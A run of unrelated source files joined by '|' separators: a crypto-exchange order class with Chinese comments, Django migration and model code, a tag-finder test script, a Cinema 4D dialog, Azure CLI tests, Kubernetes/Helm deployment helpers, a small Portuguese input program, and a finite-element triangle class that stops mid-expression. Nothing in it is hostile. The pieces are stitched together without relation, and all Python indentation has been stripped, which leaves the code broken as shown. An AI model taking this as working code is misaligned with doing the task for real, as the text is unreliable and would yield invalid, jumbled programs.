return {"【交易提醒】下单结果": order_info}
if order_info["订单状态"] == "部分成交":
try:
self.revoke_order(order_id=result['order_id'])
state = self.get_order_info(order_id=result['order_id'])
if state['订单状态'] == "撤单成功":
return self.sellshort(float(self.get_ticker()['last']) * (1 - config.reissue_order),
size - state["已成交数量"])
except:
order_info = self.get_order_info(order_id=result['order_id']) # 下单后查询一次订单状态
if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ": # 如果订单状态为"完全成交"或者"失败",返回结果
return {"【交易提醒】下单结果": order_info}
if config.automatic_cancellation:
# 如果订单未完全成交,且未设置价格撤单和时间撤单,且设置了自动撤单,就自动撤单并返回下单结果与撤单结果
try:
self.revoke_order(order_id=result['order_id'])
state = self.get_order_info(order_id=result['order_id'])
return {"【交易提醒】下单结果": state}
except:
order_info = self.get_order_info(order_id=result['order_id']) # 下单后查询一次订单状态
if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ": # 如果订单状态为"完全成交"或者"失败",返回结果
return {"【交易提醒】下单结果": order_info}
else: # 未启用交易助手时,下单并查询订单状态后直接返回下单结果
return {"【交易提醒】下单结果": order_info}
else: # 回测模式
return "回测模拟下单成功!"
def buytocover(self, price, size, order_type=None):
if config.backtest is False:
order_type = order_type or 0
try:
result = self.__okex_swap.take_order(self.__instrument_id, 4, price, size, order_type=order_type)
except Exception as e:
raise SendOrderError(e)
order_info = self.get_order_info(order_id=result['order_id']) # 下单后查询一次订单状态
if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ": # 如果订单状态为"完全成交"或者"失败",返回结果
return {"【交易提醒】下单结果": order_info}
# 如果订单状态不是"完全成交"或者"失败"
if config.price_cancellation: # 选择了价格撤单时,如果最新价超过委托价一定幅度,撤单重发,返回下单结果
if order_info["订单状态"] == "等待成交":
if float(self.get_ticker()['last']) >= price * (1 + config.price_cancellation_amplitude):
try:
self.revoke_order(order_id=result['order_id'])
state = self.get_order_info(order_id=result['order_id'])
if state['订单状态'] == "撤单成功":
return self.buytocover(float(self.get_ticker()['last']) * (1 + config.reissue_order),
size - state["已成交数量"])
except:
order_info = self.get_order_info(order_id=result['order_id']) # 下单后查询一次订单状态
if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ": # 如果订单状态为"完全成交"或者"失败",返回结果
return {"【交易提醒】下单结果": order_info}
if order_info["订单状态"] == "部分成交":
if float(self.get_ticker()['last']) >= price * (1 + config.price_cancellation_amplitude):
try:
self.revoke_order(order_id=result['order_id'])
state = self.get_order_info(order_id=result['order_id'])
if state['订单状态'] == "撤单成功":
return self.buytocover(float(self.get_ticker()['last']) * (1 + config.reissue_order),
size - state["已成交数量"])
except:
order_info = self.get_order_info(order_id=result['order_id']) # 下单后查询一次订单状态
if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ": # 如果订单状态为"完全成交"或者"失败",返回结果
return {"【交易提醒】下单结果": order_info}
if config.time_cancellation: # 选择了时间撤单时,如果委托单发出多少秒后不成交,撤单重发,直至完全成交,返回成交结果
time.sleep(config.time_cancellation_seconds)
order_info = self.get_order_info(order_id=result['order_id'])
if order_info["订单状态"] == "等待成交":
try:
self.revoke_order(order_id=result['order_id'])
state = self.get_order_info(order_id=result['order_id'])
if state['订单状态'] == "撤单成功":
return self.buytocover(float(self.get_ticker()['last']) * (1 + config.reissue_order),
size - state["已成交数量"])
except:
order_info = self.get_order_info(order_id=result['order_id']) # 下单后查询一次订单状态
if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ": # 如果订单状态为"完全成交"或者"失败",返回结果
return {"【交易提醒】下单结果": order_info}
if order_info["订单状态"] == "部分成交":
try:
self.revoke_order(order_id=result['order_id'])
state = self.get_order_info(order_id=result['order_id'])
if state['订单状态'] == "撤单成功":
return self.buytocover(float(self.get_ticker()['last']) * (1 + config.reissue_order),
size - state["已成交数量"])
except:
order_info = self.get_order_info(order_id=result['order_id']) # 下单后查询一次订单状态
if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ": # 如果订单状态为"完全成交"或者"失败",返回结果
return {"【交易提醒】下单结果": order_info}
if config.automatic_cancellation:
# 如果订单未完全成交,且未设置价格撤单和时间撤单,且设置了自动撤单,就自动撤单并返回下单结果与撤单结果
try:
self.revoke_order(order_id=result['order_id'])
state = self.get_order_info(order_id=result['order_id'])
return {"【交易提醒】下单结果": state}
except:
order_info = self.get_order_info(order_id=result['order_id']) # 下单后查询一次订单状态
if order_info["订单状态"] == "完全成交" or order_info["订单状态"] == "失败 ": # 如果订单状态为"完全成交"或者"失败",返回结果
return {"【交易提醒】下单结果": order_info}
else: # 未启用交易助手时,下单并查询订单状态后直接返回下单结果
return {"【交易提醒】下单结果": order_info}
else: # 回测模式
return "回测模拟下单成功!"
def BUY(self, cover_short_price, cover_short_size, open_long_price, open_long_size, order_type=None):
if config.backtest is False:
order_type = order_type or 0
result1 = self.buytocover(cover_short_price, cover_short_size, order_type)
if "完全成交" in str(result1):
result2 = self.buy(open_long_price, open_long_size, order_type)
return {"平仓结果": result1, "开仓结果": result2}
else:
return result1
else: # 回测模式
return "回测模拟下单成功!"
def SELL(self, cover_long_price, cover_long_size, open_short_price, open_short_size, order_type=None):
if config.backtest is False:
order_type = order_type or 0
result1 = self.sell(cover_long_price, cover_long_size, order_type)
if "完全成交" in str(result1):
result2 = self.sellshort(open_short_price, open_short_size, order_type)
return {"平仓结果": result1, "开仓结果": result2}
else:
return result1
else: # 回测模式
return "回测模拟下单成功!"
def get_order_list(self, state, limit):
receipt = self.__okex_swap.get_order_list(self.__instrument_id, state=state, limit=limit)
return receipt
def revoke_order(self, order_id):
receipt = self.__okex_swap.revoke_order(self.__instrument_id, order_id)
if receipt['error_code'] == "0":
return '【交易提醒】撤单成功'
else:
return '【交易提醒】撤单失败' + receipt['error_message']
def get_order_info(self, order_id):
result = self.__okex_swap.get_order_info(self.__instrument_id, order_id)
instrument_id = result['instrument_id']
action = None
if result['type'] == '1':
action = "买入开多"
elif result['type'] == '2':
action = "卖出开空"
if result['type'] == '3':
action = "卖出平多"
if result['type'] == '4':
action = "买入平空"
price = float(result['price_avg']) # 成交均价
amount = int(result['filled_qty']) # 已成交数量
if instrument_id.split("-")[1] == "usd" or instrument_id.split("-")[1] == "USD":
turnover = float(result['contract_val']) * int(result['filled_qty'])
elif instrument_id.split("-")[1] == "usdt" or instrument_id.split("-")[1] == "USDT":
turnover = round(float(result['contract_val']) * int(result['filled_qty']) * float(result['price_avg']), 2)
if int(result['state']) == 2:
dict = {"交易所": "Okex永续合约", "合约ID": instrument_id, "方向": action, "订单状态": "完全成交", "成交均价": price,
"已成交数量": amount, "成交金额": turnover}
return dict
elif int(result['state']) == -2:
dict = {"交易所": "Okex永续合约", "合约ID": instrument_id, "方向": action, "订单状态": "失败"}
return dict
elif int(result['state']) == -1:
dict = {"交易所": "Okex永续合约", "合约ID": instrument_id, "方向": action, "订单状态": "撤单成功", "成交均价": price,
"已成交数量": amount, "成交金额": turnover}
return dict
elif int(result['state']) == 0:
dict = {"交易所": "Okex永续合约", "合约ID": instrument_id, "方向": action, "订单状态": "等待成交"}
return dict
elif int(result['state']) == 1:
dict = {"交易所": "Okex永续合约", "合约ID": instrument_id, "方向": action, "订单状态": "部分成交", "成交均价": price,
"已成交数量": amount, "成交金额": turnover}
return dict
elif int(result['state']) == 3:
dict = {"交易所": "Okex永续合约", "合约ID": instrument_id, "方向": action, "订单状态": "下单中"}
return dict
elif int(result['state']) == 4:
dict = {"交易所": "Okex永续合约", "合约ID": instrument_id, "方向": action, "订单状态": "撤单中"}
return dict
def get_kline(self, time_frame):
if time_frame == "1m" or time_frame == "1M":
granularity = '60'
elif time_frame == '3m' or time_frame == "3M":
granularity = '180'
elif time_frame == '5m' or time_frame == "5M":
granularity = '300'
elif time_frame == '15m' or time_frame == "15M":
granularity = '900'
elif time_frame == '30m' or time_frame == "30M":
granularity = '1800'
elif time_frame == '1h' or time_frame == "1H":
granularity = '3600'
elif time_frame == '2h' or time_frame == "2H":
granularity = '7200'
elif time_frame == '4h' or time_frame == "4H":
granularity = '14400'
elif time_frame == '6h' or time_frame == "6H":
granularity = '21600'
elif time_frame == '12h' or time_frame == "12H":
granularity = '43200'
elif time_frame == '1d' or time_frame == "1D":
granularity = '86400'
else:
raise KlineError
receipt = self.__okex_swap.get_kline(self.__instrument_id, granularity=granularity)
return receipt
def get_position(self, mode=None):
receipt = self.__okex_swap.get_specific_position(self.__instrument_id)
if mode == "both":
result = {
receipt['holding'][0]["side"]: {
"price": float(receipt['holding'][0]['avg_cost']),
"amount": int(receipt['holding'][0]['position'])
},
receipt['holding'][1]["side"]: {
"price": float(receipt['holding'][1]['avg_cost']),
"amount": int(receipt['holding'][1]['position'])
}
}
return result
else:
direction = receipt['holding'][0]['side']
amount = int(receipt['holding'][0]['position'])
price = float(receipt['holding'][0]['avg_cost'])
if amount == 0:
direction = "none"
result = {'direction': direction, 'amount': amount, 'price': price}
return result
def get_contract_value(self):
receipt = self.__okex_swap.get_instruments()
result = {}
for item in receipt:
result[item['instrument_id']] = item['contract_val']
contract_value = float(result[self.__instrument_id])
return contract_value
def get_ticker(self):
receipt = self.__okex_swap.get_specific_ticker(instrument_id=self.__instrument_id)
return receipt
def get_depth(self, type=None, size=None):
"""
OKEX永续合约获取深度数据
:param type: 如不传参,返回asks和bids;只获取asks传入type="asks";只获取"bids"传入type="bids"
:param size: 返回深度档位数量,最多返回200,默认10档
:return:
"""
size = size or 10
response = self.__okex_swap.get_depth(self.__instrument_id, size=size)
asks_list = response["asks"]
bids_list = response["bids"]
asks = []
bids = []
for i in asks_list:
asks.append(float(i[0]))
for j in bids_list:
bids.append(float(j[0]))
if type == "asks":
return asks
elif type == "bids":
return bids
else:
return response
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-12-01 22:15
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('vtn', '0052_auto_20171201_1346'),
]
operations = [
migrations.RemoveField(
model_name='drevent',
name='previous_version',
),
migrations.RemoveField(
model_name='siteevent',
name='superseded',
),
]
|
from django.db.models import (
CASCADE,
Model,
OneToOneField,
ForeignKey,
)
from gbe.models import StyleVersion
from django.contrib.auth.models import User
class UserStylePreview(Model):
version = ForeignKey(StyleVersion, on_delete=CASCADE)
previewer = OneToOneField(User, on_delete=CASCADE)
class Meta:
app_label = "gbe"
|
# -*- coding: utf-8 -*-
'''
Created on 01.12.2014
@author: Simon Gwerder
'''
import json
import timeit
import requests
from ordered_set import OrderedSet
from utilities import utils
from utilities.retry import retry
class IDPreset:
name = None
terms = []
tags = []
def __init__(self):
self.name = None
self.terms = []
self.tags = []
class IDPresetsSetup:
idPresets = OrderedSet()
def getIDPresets(self):
return self.idPresets
def __init__(self, presetFilePath):
if presetFilePath is None: return
fileHandler = open(presetFilePath)
jsonData = json.load(fileHandler)
iterList = []
for item in jsonData:
iterList.append(item)
iterList.sort()
for item in iterList:
if item.count('/') > 1: continue
idPreset = IDPreset()
if 'name' in jsonData[item]:
idPreset.name = jsonData[item]['name']
else:
continue
if 'tags' in jsonData[item]:
for key in jsonData[item]['tags']:
if key is not 'name':
tag = key + '=' + jsonData[item]['tags'][key]
idPreset.tags.append(tag)
else:
continue
idPreset.terms.append(idPreset.name)
if 'terms' in jsonData[item]:
for term in jsonData[item]['terms']:
idPreset.terms.append(term)
self.idPresets.append(idPreset)
fileHandler.close()
class TestRun:
tagFinderAPI = 'http://localhost:5000/api/search?q='
@retry(Exception, tries=3)
def apiCallTagfinder(self, searchTerm):
response = requests.get(self.tagFinderAPI + searchTerm)
#response = urllib.urlopen(self.tagFinderAPI + searchTerm)
if response.status_code < 400:
return response.json()
return None
def getTagDictFromCall(self, responseJson):
retDict = { }
for tfTag in responseJson:
prefLabel = tfTag['prefLabel']
if not '=' in prefLabel: # is a key
prefLabel = prefLabel + '=*'
retDict[prefLabel] = tfTag['searchMeta']
return retDict
def __init__(self, idPresetsSetup):
print 'IDEDITOR PRESET TESTS'
current = 1
testTotal = len(idPresetsSetup.getIDPresets())
nameTotal = len(idPresetsSetup.getIDPresets())
altTermTotal = -nameTotal # they are also contained in the terms list, for convenient search
testFound = 0
nameFound = 0
altTermFound = 0
for idPreset in idPresetsSetup.getIDPresets():
titleStr = '\n\nTest ' + str(current) + '/' + str(len(idPresetsSetup.getIDPresets())) + ' - Name: ' + idPreset.name
print titleStr
print '=' * 60
print 'Tags: ' + ", ".join(idPreset.tags)
found = False
for term in idPreset.terms:
responseJson = self.apiCallTagfinder(term)
if responseJson is None:
print 'Call failed!'
else:
foundList = self.getTagDictFromCall(responseJson)
interSectionSet = set(idPreset.tags).intersection(set(foundList.keys()))
if len(interSectionSet) == 0:
print '{0}{1:<20s}{2}'.format('Term: ', term, ' > none found')
else:
found = True
print '{0}{1:<20s}{2}{3}'.format('Term: ', term, ' > found: ', ', '.join(interSectionSet))
#for searchMeta in foundList.values():
# print searchMeta
if term is idPreset.name:
nameFound = nameFound + 1
else:
altTermFound = altTermFound + 1
altTermTotal = altTermTotal + 1
if found:
testFound = testFound + 1
current = current + 1
print '\n\n'
print '=' * 60
print '=' * 60
print 'Found test tags : ' + str(testFound) + '/' + str(testTotal)
print 'Found \"names\" : ' + str(nameFound) + '/' + str(nameTotal)
print 'Found \"terms\" : ' + str(altTermFound) + '/' + str(altTermTotal)
if __name__ == '__main__':
startTime = timeit.default_timer()
setup = IDPresetsSetup(utils.testDir() + 'blackboxtests.json')
#TagFinder needs to be running. Can also start TagFinder locally here.
TestRun(setup)
endTime = timeit.default_timer()
elapsed = endTime - startTime
print '\nTime elapsed running test: ' + str(elapsed / 60) + ' mins'
|
_base_ = [
'cascade_mask_rcnn_r50_fpn.py',
'coco_instance.py',
'schedule_1x.py', 'default_runtime.py'
]
|
import c4d
from ..Const import Const
from .ConfigManagerRedshift import ConfigManagerRedshift
const = Const()
class ConfigManager(c4d.gui.GeDialog, ConfigManagerRedshift):
def __init__(self):
self.jsonContent = self.loadJsonFile()
self.redshiftConfig = self.jsonContent["redshift"]
self.dataChanged = False
def refresh(self):
self.jsonContent = self.loadJsonFile()
self.redshiftConfig = self.jsonContent["redshift"]
self.dataChanged = False
def Command(self, id, msg):
if id == const.UI_OPTION_END_OK:
self.generateRedshiftjson(self)
self.jsonContent = self.saveJsonFile(self.jsonContent)
self.dataChanged = True
self.Close()
if id == const.UI_OPTION_END_CANCEL:
self.Close()
return True
def CreateLayout(self):
#Redshift
self.SetTitle('Config')
if self.GroupBegin(const.GRP_TAB_REDSHIFT_GRP, c4d.BFH_SCALEFIT | c4d.BFV_SCALEFIT, 1, 500, "Redshift", inith=200):
if self.ScrollGroupBegin(const.GRP_TAB_REDSHIFT_SCROLL_OPT, c4d.BFH_SCALEFIT | c4d.BFV_SCALEFIT, c4d.SCROLLGROUP_VERT, 0, 0):
if self.GroupBegin(const.GRP_OPT_TAB_REDSHIFT, c4d.BFH_SCALEFIT | c4d.BFV_SCALEFIT, 1, 500, "Redshift"):
self.createRedshiftCheckBox(self)
self.GroupEnd()
self.GroupEnd()
self.GroupEnd()
if self.GroupBegin(const.LIGHT_LISTER_REDSHIFT_OPTIONS_START, c4d.BFH_CENTER | c4d.BFV_CENTER, 100, 100):
self.GroupBorderSpace(30, 5, 0, 2)
self.AddButton(const.UI_OPTION_END_OK, c4d.BFH_CENTER | c4d.BFV_TOP, 0, 20, "Ok ")
self.AddButton(const.UI_OPTION_END_CANCEL, c4d.BFH_CENTER | c4d.BFV_TOP, 0, 20, "Cancel")
self.GroupEnd()
return True
|
import pytest
# Set the path to import az
import context
from az.cli import az
AZ_SUCCESSFUL_COMMAND = "group list"
AZ_FAIL_COMMAND = "group show -n this-does-not-exist"
def test_az(az_login):
error_code, result_dict, log = az(AZ_SUCCESSFUL_COMMAND)
assert log == ""
assert error_code == 0
def test_az_failure(az_login):
error_code, result_dict, log = az(AZ_FAIL_COMMAND)
assert error_code != 0
assert log
|
import datetime
import time
from typing import TYPE_CHECKING
import frappe
from kubernetes import client, config
from kubernetes.client.rest import ApiException
if TYPE_CHECKING:
from erpnext_feature_board.erpnext_feature_board.doctype.improvement.improvement import (
Improvement,
)
def get_container_registry():
return frappe.get_conf().get(
"container_registry",
"registry.localhost:5000",
)
def to_dict(obj):
if hasattr(obj, "attribute_map"):
result = {}
for k, v in getattr(obj, "attribute_map").items():
val = getattr(obj, k)
if val is not None:
result[v] = to_dict(val)
return result
elif type(obj) == list:
return [to_dict(x) for x in obj]
elif type(obj) == datetime:
return str(obj)
else:
return obj
def load_config():
if frappe.get_conf().get("developer_mode"):
config.load_kube_config()
else:
config.load_incluster_config()
def get_namespace():
return frappe.get_conf().get("kubernetes_namespace", "efb")
def create_build_image_job(improvement: "Improvement", image_tag, git_repo, git_branch):
load_config()
job_name = f"build-{improvement.name}".lower() # only lowercase only allowed
batch_v1_api = client.BatchV1Api()
body = client.V1Job(api_version="batch/v1", kind="Job")
body.metadata = client.V1ObjectMeta(
namespace=get_namespace(),
name=job_name,
)
body.status = client.V1JobStatus()
volume_mounts = None
volumes = None
host_aliases = None
worker_args = [
f"--dockerfile=build/{improvement.app_name}-worker/Dockerfile",
"--context=git://github.com/frappe/frappe_docker.git",
f"--build-arg=GIT_REPO={git_repo}",
f"--build-arg=IMAGE_TAG={image_tag}",
f"--build-arg=GIT_BRANCH={git_branch}",
f"--destination={get_container_registry()}/{improvement.app_name}-worker:{improvement.name}",
]
nginx_args = [
f"--dockerfile=build/{improvement.app_name}-nginx/Dockerfile",
"--context=git://github.com/frappe/frappe_docker.git",
f"--build-arg=GIT_REPO={git_repo}",
f"--build-arg=IMAGE_TAG={image_tag}",
f"--build-arg=GIT_BRANCH={git_branch}",
f"--build-arg=FRAPPE_BRANCH={image_tag}",
f"--destination={get_container_registry()}/{improvement.app_name}-nginx:{improvement.name}",
]
if frappe.get_conf().get("developer_mode"):
worker_args.append("--insecure")
nginx_args.append("--insecure")
host_aliases = [
client.V1HostAlias(
ip=frappe.get_conf().get("docker_host_ip", "172.17.0.1"),
hostnames=["registry.localhost"],
)
]
if not frappe.get_conf().get("developer_mode"):
volume_mounts = [
client.V1VolumeMount(
mount_path="/kaniko/.docker",
name="container-config",
)
]
volumes = [
client.V1Volume(
name="container-config",
projected=client.V1ProjectedVolumeSource(
sources=[
client.V1VolumeProjection(
secret=client.V1SecretProjection(
name=frappe.get_conf().get(
"container_push_secret", "regcred"
),
items=[
client.V1KeyToPath(
key=".dockerconfigjson",
path="config.json",
)
],
)
)
]
),
)
]
body.spec = client.V1JobSpec(
template=client.V1PodTemplateSpec(
spec=client.V1PodSpec(
security_context=client.V1PodSecurityContext(
supplemental_groups=[1000]
),
containers=[
client.V1Container(
name="build-worker",
image="gcr.io/kaniko-project/executor:latest",
args=worker_args,
volume_mounts=volume_mounts,
),
client.V1Container(
name="build-nginx",
image="gcr.io/kaniko-project/executor:latest",
args=nginx_args,
volume_mounts=volume_mounts,
),
],
restart_policy="Never",
volumes=volumes,
host_aliases=host_aliases,
)
)
)
try:
api_response = batch_v1_api.create_namespaced_job(
get_namespace(), body, pretty=True
)
return to_dict(api_response)
except (ApiException, Exception) as e:
out = {
"error": e,
"function_name": "create_build_image_job",
"params": {
"improvement_name": improvement.name,
"image_tag": image_tag,
"git_repo": git_repo,
"git_branch": git_branch,
},
}
reason = getattr(e, "reason")
if reason:
out["reason"] = reason
frappe.log_error(out, "Exception: BatchV1Api->create_namespaced_job")
return out
def get_job_status(job_name):
load_config()
batch_v1 = client.BatchV1Api()
try:
job = batch_v1.read_namespaced_job(name=job_name, namespace=get_namespace())
return to_dict(job)
except (ApiException, Exception) as e:
out = {
"error": e,
"function_name": "get_job_status",
"params": {"job_name": job_name},
}
reason = getattr(e, "reason")
if reason:
out["reason"] = reason
frappe.log_error(out, "Exception: BatchV1Api->read_namespaced_job")
return out
def create_helm_release(improvement: "Improvement", site_name, site_password):
db_root_user = frappe.get_conf().get("db_root_user", "root")
db_root_password = frappe.get_conf().get("db_root_password", "admin")
mariadb_host = frappe.get_conf().get(
"mariadb_host", "mariadb.mariadb.svc.cluster.local"
)
redis_queue_host = frappe.get_conf().get(
"redis_queue_host", "redis-master.redis.svc.cluster.local:6379/0"
)
redis_cache_host = frappe.get_conf().get(
"redis_cache_host", "redis-master.redis.svc.cluster.local:6379/1"
)
redis_socketio_host = frappe.get_conf().get(
"redis_socketio_host", "redis-master.redis.svc.cluster.local:6379/2"
)
load_config()
crd = client.CustomObjectsApi()
install_apps = None
if improvement.app_name == "erpnext":
install_apps = frappe.get_conf().get("install_apps", "erpnext")
body = {
"kind": "HelmRelease",
"apiVersion": "helm.fluxcd.io/v1",
"metadata": client.V1ObjectMeta(
namespace=get_namespace(),
name=improvement.name.lower(),
),
"spec": {
"chart": {
"repository": "https://helm.erpnext.com",
"name": "erpnext",
# Use >=3.2.5
"version": "3.2.5",
},
"values": {
"nginxImage": {
"repository": f"{get_container_registry()}/{improvement.app_name}-nginx",
"tag": improvement.name,
"pullPolicy": "Always",
},
"pythonImage": {
"repository": f"{get_container_registry()}/{improvement.app_name}-worker",
"tag": improvement.name,
"pullPolicy": "Always",
},
"mariadbHost": mariadb_host,
"dbRootPassword": db_root_password,
"redisQueueHost": "redis-master.redis.svc.cluster.local:6379/0",
"redisCacheHost": "redis-master.redis.svc.cluster.local:6379/1",
"redisSocketIOHost": "redis-master.redis.svc.cluster.local:6379/2",
"persistence": {
"logs": {"storageClass": "nfs"},
"worker": {"storageClass": "nfs"},
},
"createSite": {
"enabled": True,
"siteName": site_name,
"dbRootPassword": db_root_password,
"dbRootUser": db_root_user,
"adminPassword": site_password,
"installApps": install_apps,
"dropSiteOnUninstall": True,
},
"ingress": {
"enabled": True,
"hosts": [
{
"host": site_name,
"paths": [
{
"path": "/",
"pathType": "ImplementationSpecific",
}
],
},
],
},
},
},
}
if not frappe.get_conf().get("developer_mode"):
wildcard_tls_secret = frappe.get_conf().get(
"wildcard_tls_secret", "wildcard-example-com-tls"
)
body["spec"]["values"]["ingress"]["tls"] = [
{
"secretName": wildcard_tls_secret,
"hosts": [site_name],
}
]
image_pull_secrets = frappe.get_conf().get("container_push_secret", "regcred")
body["spec"]["values"]["imagePullSecrets"] = [{"name": image_pull_secrets}]
try:
res = crd.create_namespaced_custom_object(
"helm.fluxcd.io", "v1", get_namespace(), "helmreleases", body, pretty=True
)
return to_dict(res)
except (ApiException, Exception) as e:
out = {
"error": e,
"function_name": "create_helm_release",
"params": {"improvement": improvement.as_dict()},
}
reason = getattr(e, "reason")
if reason:
out["reason"] = reason
frappe.log_error(
out, "Exception: CustomObjectsApi->create_namespaced_custom_object"
)
return out
def update_helm_release(improvement_name):
migration_timestamp = str(round(time.time()))
load_config()
crd = client.CustomObjectsApi()
body = {
"spec": {
"values": {
"migrateJob": {"enable": True, "backup": False},
"migration-timestamp": migration_timestamp,
},
},
}
try:
res = crd.patch_namespaced_custom_object(
"helm.fluxcd.io",
"v1",
get_namespace(),
"helmreleases",
improvement_name.lower(),
body,
)
return to_dict(res)
except (ApiException, Exception) as e:
out = {
"error": e,
"function_name": "update_helm_release",
"params": {"improvement_name": improvement_name},
}
reason = getattr(e, "reason")
if reason:
out["reason"] = reason
frappe.log_error(out, "Exception: BatchV1Api->read_namespaced_job")
return out
def delete_helm_release(improvement_name):
load_config()
crd = client.CustomObjectsApi()
try:
res = crd.delete_namespaced_custom_object(
"helm.fluxcd.io",
"v1",
get_namespace(),
"helmreleases",
improvement_name,
)
return to_dict(res)
except (ApiException, Exception) as e:
out = {
"error": e,
"function_name": "delete_helm_release",
"params": {"improvement_name": improvement_name},
}
reason = getattr(e, "reason", None)
if reason:
out["reason"] = reason
frappe.log_error(
out, "Exception: CustomObjectsApi->delete_namespaced_custom_object"
)
return out
def delete_job(job_name):
load_config()
batch_v1 = client.BatchV1Api()
try:
job = batch_v1.delete_namespaced_job(name=job_name, namespace=get_namespace())
return to_dict(job)
except (ApiException, Exception) as e:
out = {
"error": e,
"function_name": "delete_job",
"params": {"job_name": job_name},
}
reason = getattr(e, "reason")
if reason:
out["reason"] = reason
frappe.log_error(out, "Exception: BatchV1Api->delete_namespaced_job")
return out
def get_helm_release(improvement_name):
load_config()
crd = client.CustomObjectsApi()
try:
res = crd.get_namespaced_custom_object(
"helm.fluxcd.io",
"v1",
get_namespace(),
"helmreleases",
improvement_name,
)
return to_dict(res)
except (ApiException, Exception) as e:
out = {
"error": e,
"function_name": "get_helm_release",
"params": {"improvement_name": improvement_name},
}
reason = getattr(e, "reason", None)
if reason:
out["reason"] = reason
frappe.log_error(
out, "Exception: CustomObjectsApi->get_namespaced_custom_object"
)
return out
def rollout_deployment(deployment_name):
load_config()
apps = client.AppsV1Api()
now = datetime.datetime.utcnow()
now = str(now.isoformat("T") + "Z")
body = {
"spec": {
"template": {
"metadata": {"annotations": {"kubectl.kubernetes.io/restartedAt": now}},
},
},
}
try:
res = apps.patch_namespaced_deployment(
deployment_name,
get_namespace(),
body,
)
return to_dict(res)
except (ApiException, Exception) as e:
out = {
"error": e,
"function_name": "rollout_deployment",
"params": {"deployment_name": deployment_name},
}
reason = getattr(e, "reason", None)
if reason:
out["reason"] = reason
frappe.log_error(out, "Exception: AppsV1Api->patch_namespaced_deployment")
return out
|
n = 1
l = []
while n != 0:
l.append(int(input("Digite um número: ")))
n = l[-1]
print("\n\nVocê digitou 0 e encerrou o programa!")
print("\nOs números que você digitou foram:\n")
for elemento in l:
print(elemento)
if len(l) % 2 == 0:
print("\nVocê digitou uma quantidade PAR de números!")
else:
print("\nVocê digitou uma quantidade ÍMPAR de números!")
|
import numpy as np
class Tri6:
"""Class for a six noded quadratic triangular element.
Provides methods for the calculation of section properties based on the finite element method.
:param int el_id: Unique element id
:param coords: A 2 x 6 array of the coordinates of the tri-6 nodes. The first three columns
relate to the vertices of the triangle and the last three columns correspond to the
mid-nodes.
:type coords: :class:`numpy.ndarray`
:param node_ids: A list of the global node ids for the current element
:type node_ids: list[int]
:param material: Material object for the current finite element.
:type material: :class:`~sectionproperties.pre.pre.Material`
:cvar int el_id: Unique element id
:cvar coords: A 2 x 6 array of the coordinates of the tri-6 nodes. The first three columns
relate to the vertices of the triangle and the last three columns correspond to the
mid-nodes.
:vartype coords: :class:`numpy.ndarray`
:cvar node_ids: A list of the global node ids for the current element
:vartype node_ids: list[int]
:cvar material: Material of the current finite element.
:vartype material: :class:`~sectionproperties.pre.pre.Material`
"""
def __init__(self, el_id, coords, node_ids, material):
"""Inits the Tri6 class."""
self.el_id = el_id
self.coords = coords
self.node_ids = node_ids
self.material = material
def geometric_properties(self):
"""Calculates the geometric properties for the current finite element.
:return: Tuple containing the geometric properties and the elastic and shear moduli of the
element: *(area, qx, qy, ixx, iyy, ixy, e, g)*
:rtype: tuple(float)
"""
# initialise geometric properties
area = 0
qx = 0
qy = 0
ixx = 0
iyy = 0
ixy = 0
# Gauss points for 6 point Gaussian integration
gps = gauss_points(6)
# loop through each Gauss point
for gp in gps:
# determine shape function, shape function derivative and jacobian
(N, _, j) = shape_function(self.coords, gp)
area += gp[0] * j
qx += gp[0] * np.dot(N, np.transpose(self.coords[1, :])) * j
qy += gp[0] * np.dot(N, np.transpose(self.coords[0, :])) * j
ixx += gp[0] * np.dot(N, np.transpose(self.coords[1, :])) ** 2 * j
iyy += gp[0] * np.dot(N, np.transpose(self.coords[0, :])) ** 2 * j
ixy += (
gp[0] * np.dot(N, np.transpose(self.coords[1, :])) * np.dot(
N, np.transpose(self.coords[0, :])) * j
)
return (
area, qx, qy, ixx, iyy, ixy, self.material.elastic_modulus, self.material.shear_modulus
)
def torsion_properties(self):
"""Calculates the element stiffness matrix used for warping analysis and the torsion load
vector.
:return: Element stiffness matrix *(k_el)* and element torsion load vector *(f_el)*
:rtype: tuple(:class:`numpy.ndarray`, :class:`numpy.ndarray`)
"""
# initialise stiffness matrix and load vector
k_el = 0
f_el = 0
# Gauss points for 6 point Gaussian integration
gps = gauss_points(6)
for gp in gps:
# determine shape function, shape function derivative and jacobian
(N, B, j) = shape_function(self.coords, gp)
# determine x and y position at Gauss point
Nx = np.dot(N, np.transpose(self.coords[0, :]))
Ny = np.dot(N, np.transpose(self.coords[1, :]))
# calculated modulus weighted stiffness matrix and load vector
k_el += gp[0] * np.dot(np.transpose(B), B) * j * (self.material.elastic_modulus)
f_el += (
gp[0] * np.dot(np.transpose(B), np.transpose(np.array([Ny, -Nx]))) *
j * self.material.elastic_modulus
)
return (k_el, f_el)
def shear_load_vectors(self, ixx, iyy, ixy, nu):
"""Calculates the element shear load vectors used to evaluate the shear functions.
:param float ixx: Second moment of area about the centroidal x-axis
:param float iyy: Second moment of area about the centroidal y-axis
:param float ixy: Second moment of area about the centroidal xy-axis
:param float nu: Effective Poisson's ratio for the cross-section
:return: Element shear load vector psi *(f_psi)* and phi *(f_phi)*
:rtype: tuple(:class:`numpy.ndarray`, :class:`numpy.ndarray`)
"""
# initialise force vectors
f_psi = 0
f_phi = 0
# Gauss points for 6 point Gaussian integration
gps = gauss_points(6)
for gp in gps:
# determine shape function, shape function derivative and jacobian
(N, B, j) = shape_function(self.coords, gp)
# determine x and y position at Gauss point
Nx = np.dot(N, np.transpose(self.coords[0, :]))
Ny = np.dot(N, np.transpose(self.coords[1, :]))
# determine shear parameters
r = Nx ** 2 - Ny ** 2
q = 2 * Nx * Ny
d1 = ixx * r - ixy * q
d2 = ixy * r + ixx * q
h1 = -ixy * r + iyy * q
h2 = -iyy * r - ixy * q
f_psi += (
gp[0] * (nu / 2 * np.transpose(np.transpose(B).dot(np.array([[d1], [d2]])))[0] +
